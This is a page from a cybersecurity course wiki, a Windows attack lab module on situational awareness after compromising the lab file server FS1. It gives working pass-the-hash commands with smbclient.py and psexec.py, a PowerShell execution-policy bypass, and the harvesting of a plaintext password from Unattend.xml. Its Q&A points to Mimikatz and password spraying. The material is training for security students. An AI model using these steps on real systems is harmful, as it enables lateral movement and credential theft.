📘
CAS Cybersecurity
  • Start
  • Reconnaissance
    • Opensource Intelligence
  • Docker basics and Images
    • Damn Vulnerable Webapp
    • bWAPP
    • Juice Webshop
    • Webgoat
    • Metasploitable 2
    • Metasploitable 3
    • MISP Docker (old)
    • MISP Docker (new)
  • Scanning and Enumeration
    • Scanning with zenmap
    • Scanning with nmap
    • Scanning with msf auxiliary
  • Vulnerability Scanning and Analysis
    • OpenVAS
    • nmap vulnerability scan
    • MSF Auxiliary Modules
  • Exploitation
    • Metasploitable 2
    • Redis Server
    • Print Nightmare
    • Baron Samedit
    • Polkit
    • Heartbleed
  • Man in the Middle
    • ARP Cache poisoning
    • RDP MitM Exercise
  • Windows Hacking
    • Throwback Network
      • Entering the breach
      • Exploring the caverns
      • Webshells and you!
      • First Contact
    • WinAttack LAB
      • Module 01
      • Module 02
      • Module 03
      • Module 04
      • Module 05
      • Module 06
      • Module 07
      • Module 08
      • Module 09
      • Module 10
  • Web Application Security
    • Burp Proxy Introduction
    • DVWA
      • DVWA Exercises 1
      • DVWA Exercises 2
      • DVWA Exercises 3
      • DVWA Exercises 4
      • DVWA Exercises 5
      • DVWA Exercises 6
      • DVWA Exercises 7
      • DVWA Exercises 8
  • CTF and Crypto Exercises
    • Cyberchef Challenge
    • HTB Invite Challenge
    • BSides London 2019 Challenge
    • Ninja Sec Challenge
  • Threat Intelligence
    • MISP Exercise 1
    • MISP Exercise 2
    • MISP Exercise 3
    • MISP Exercise 4
    • MISP Exercise 5
    • MISP Exercise 6
    • MISP Exercise 7
    • MISP Exercise 8
    • Virus Total Graph Exercise
    • RFI Incoming!
  • Forensic Exercises
    • Disk Forensics
      • The Sleuth Kit Intro
      • Filecarving with Foremost
      • Filecarving with scalpel
      • Bulk extractor
      • Disk acquisition with dd
      • Disk acquisition with dcfldd
      • Disk acquisition with ewftools
      • Disk acquisition with FTK Imager
      • Mount disk image (raw)
      • Unknown USB Stick
      • USB Stick Filecarving
      • Autopsy Exercise
    • Windows Forensics
      • Bitunlocker
      • Alternate Datastreams
    • Memory Forensics
      • Volatility2 Basics (Linux)
      • Volatility2 Exercise 1
      • Volatility3 Exercise 1
      • Volatility3 Exercise 2
      • Volatility3 Exercise 3
    • Image Forensics
      • Unswirl Image
      • Manual Filecarving 1
      • Manual Filecarving 2
    • Browser Forensics
    • Mail Header Analysis
    • Timestomping Exercise
    • Network Forensics
      • Tshark Exercise
  • Malware Analysis
    • Ransomware
      • General Introduction
      • Ryuk
      • RansomEXX
      • REvil
      • BlackMatter
      • Hades
      • Egregor
      • DoppelPaymer
    • YARA
      • YARA Install
      • yarGen
      • YARA with Cyberchef
      • TCP dump analysis
      • Memory dump analysis
    • Dosfuscated Scripts
  • Android Malware
    • LAB Setup 1
    • LAB Setup 2
    • Android Manifest
    • Android Permissions
    • APP Tracing with Frida
    • AES Key decryption
    • RedAlert
    • BlackRoseLucy
    • Crackme RE Challenge
  • Forensic Readiness
    • Windows Event Logs
    • Windows Sysmon
    • Sysmon: Capture Clipboard
    • Sysmon: Process Injection
    • Ransomware Detection
      • Signature based
  • Live Response
    • Velociraptor P1
    • Velociraptor P2
    • Velociraptor P3
    • Windows Response LAB
      • Lateral Movement Detection
      • Detect persistence
      • Volatility Analysis
Powered by GitBook
On this page
  • Win Attack LAB: Situational Awareness on FS1
  • 1. Introduction
  • 2. Acquiring the necessary tools
  • 3. Unpacking and running PrivescCheck
  • 4. Analyzing the Results
  • 5. Security Questions
  • 6. Answers

Was this helpful?

  1. Windows Hacking
  2. WinAttack LAB

Module 06

PreviousModule 05NextModule 07

Last updated 3 years ago

Was this helpful?

Win Attack LAB: Situational Awareness on FS1

1. Introduction

We have now gained access to the host FS1.winattacklab.local with administrative privileges. This means, that we don't need to look for local privilege escalation methods anymore. Instead, the goal is to find other valuable information, which might help us to compromise other users or hosts.

2. Acquiring the necessary tools

Compared to the Windows 10 client, none of our tools are installed on FS1 yet. Therefore, we need to prepare our setup first. To perform the situational awareness, we are going to use a tool called PrivescCheck

First, we need to download it to our Linux attack host and then move it to FS1. On your Linux attack host, change to the tools directory:

cd /home/lab_admin/tools/

Then issue the following command to download all necessary resources as a ZIP archive:

curl -JLO https://github.com/itm4n/PrivescCheck/archive/refs/heads/master.zip

Next, we will move the ZIP archive to FS1 using smbclient.py as user aalfort:

smbclient.py -hashes :9859340265d3b3c1eb628ece70ebc238 winattacklab.local/aalfort@10.0.1.101

Switch to the C drive, upload the ZIP file and exit again:

use c$ put PrivescCheck-master.zip exit

3. Unpacking and running PrivescCheck

Once the archive has been uploaded, we can again connect to FS1 via psexec.py (as previously in "Windows Attack Lab - Step 6 - Lateral Movement to FS1") and run it.

Use the following command to establish the connection from your Linux attack host to FS1 as user aalfort:

psexec.py -hashes :9859340265d3b3c1eb628ece70ebc238 winattacklab.local/aalfort@10.0.1.101

You should now have a command prompt:

Now switch to the root of the C drive:

cd c:\

Next, unpack the archive:

tar -xf PrivescCheck-master.zip

cd PrivescCheck-master

Lastly, we can import and execute the script with one single command:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

You should see the following output, as the script begins to run:

WARNING: You are running this script as an administrator! Some checks will be automatically disabled. WARNING: You can specify the '-Force' option to disable this warning message. ....

4. Analyzing the Results

After some time, PrivescCheck should complete and present you with the following output:

The lines marked with KO are of interest to us!

This indicates that a file used for unattended installation was found, which oftentimes contains credentials. If you scroll up a bit in the output, you should eventually find the details for this finding:

As you can see above, PrivescCheck directly parsed the file and found the password Winter2019 for user admin

5. Security Questions

  1. What is the intended use of the file Unattend.xml?

  2. Why is a password in this file?

  3. What is your recommendation to fix the problem

  4. What other technique could we apply in order to get even more credentials from FS1?

  5. What could we do next with the credentials gathered from Unattend.xml?

6. Answers

  1. This file was used for an unattended installation which adds a local user with username admin and password Winter2019

  2. The XML files contains the actions which should be performed on the target system (FS1). First the file with included username and password will be distributed (copied to FS1) and then executed to create this user. So the file contains both username and also the associated password.

  3. Recommendations:

  • Cleanup of the files after the deployment (delete file).

  • Restrict access to answer files (access control lists or permissions on a file).

  • Hide passwords (only limited possible)

  • If it’s e.g. a domain join use accounts with lower priviledge.

4. Techniques:

  • credential dumping (Mimikatz)

  • check for user home directories (C:\Users) on FS1 (show users which are logged in on FS1)

Check for further information with PowerSploit:

  • Autologon credentials in the registry

  • web.config strings

  • passwords in cached Group Policy Preferences files

5. With the password found we can perform the following steps:

  • Password Spraying to get users with the same password

  • login on other systems with the gathered username and password (verify same local admin exists on several systems)